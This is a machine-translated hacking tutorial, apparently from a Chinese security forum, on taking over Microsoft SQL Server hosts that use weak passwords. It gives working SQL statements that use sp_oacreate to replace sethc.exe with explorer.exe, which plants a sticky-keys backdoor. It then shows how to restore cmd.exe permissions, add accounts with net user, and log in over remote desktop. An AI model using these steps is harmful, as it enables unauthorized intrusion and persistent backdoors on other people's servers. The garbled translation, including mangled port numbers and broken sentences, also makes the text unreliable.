1 4 3 3 weak passwords the use of shift functions smartly provide the right-vulnerability warning-the black bar safety net

ID MYHACK58:62200923251
Type myhack58
Reporter 佚名
Modified 2009-05-15T00:00:00


This is the third hair about 1 4 3 3 weak password tutorial, the previous two tutorials also for 1 4 3 3 the repair and provide the right for a detailed explanation, today still give us a 1 4 3 3 weak passwords to mention the right methods. That is clever, in fact, many large cattle have long been in use, and this tutorial is intended for beginner 1 4 3 3 weak passwords provide the right to the rookie, master, please disregard. Connected weak password host !

Just run a dos command, the error message: Error Message:xpsql.cpp: error 5 from CreateProcess(7 3 7)on one period of tutorial the server is also this error, we bypass the error to get webshell, is looking for on the server site, the use of the splitter transmission the pony, and then spread in Malaysia on. This week we talk about the next this error causes, as well as the artful repair actually also can be said to be bypassing the He to right. Error 5 is a system prompt the error number, CreateProcess this is to create a thread of meaning, this error is generated and the system files cmd. exe have a great relationship, a case is a cmd is deleted, one is the cmd of permissions is reduced. (If I this saying there's anything wrong, please master that moment, I understood that way). Go to windowssystem32 directory and the sql installation directory to see whether the required files are in ! cmd. exe exists! odsole70. the dll is there, why to look at this file exists? Because we want to use the stored procedure need to this file. Following the first review under the terminal port, and open the case sql command input exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp','PortNumber' ! returns successfully, the terminal Port 7 8 Open 3 3 8 9 connection command mstsc connection IP:7 8 appear the login screen, to prove that 7 8 The port is open to the public. Well, below key, to use two sql command, the System explorer to copy the file to system shift back door files, the following two statements are executed, not put together to perform, I was in the sql tools 2.0 tool implementation, you can also be in the separator of execution, recall execution respectively. //这 条 语句 将 explorer.exe 复制 为 sethc.exe declare @o int exec sp_oacreate 'scripting. filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:windowsexplorer.exe','c:windowssystem32sethc.exe'; //This statement will with. exe copied to the dllcache directory declare @oo int exec sp_oacreate 'scripting. filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:windowssystem32sethc.exe','c:windowssystem32dllcachesethc.exe'; This two statements execute in the time interval is preferably not more than 1 0 seconds, otherwise the system will automatically restore the original file. In addition these two statements use the sp_oacreate stored procedure need to use to odsole70. dll this file, so this file's existence, the relationship to create success. Played shift back door people at a glance, this is one of the oldest shift the back door to create a method, tutorial see here an estimated half of the people you want to turn off the web page, then the remaining half of the rookie let's continue the Exchange. Go The those are master^_^ This section is not a screenshot, see the return information is good Copy well, we go to the connected 3 3 8 9 run shift the back door to try ! five times a shift after the interface pop-up the Explorer. 到 windowssystem32 目录 下 找到 cmd.exe, double-click the run try! That is not the appropriate permissions to run it. In the cmd. exe on right click Properties, look under the Security tab! see the system of permissions are all denied, and select Allow Full Control, click Apply, change the cmd's permission to run, ok so then double-click the cmd, he may be running, the following net user command to add users right now. At this time I prompt you, at this point you then go to the sql tools to run following dos command, can be found normal operation., the description of this error Error Message:xpsql.cpp: error 5 from CreateProcess(7 3 line 7)to produce the reason, is because the cmd permission issue, after encounter this problem, you'll know how to handle. Well, with the newly added user to log in under the server, note that the terminal port. ! | period on the tutorial someone asked me, if the server's not on the site do, in fact, mention of the right of way of methods varied, sometimes not with a single method will be able to provide the right success, you can consider a variety of binding methods used. Well, three consecutive period of 1 4 3 3 weak passwords. the right method I will introduce so much, and so I learn to be more method and then share. Thank you all for the patience reading this tutorial. This tutorial is only for learning exchanges, please do not used for illegal purposes.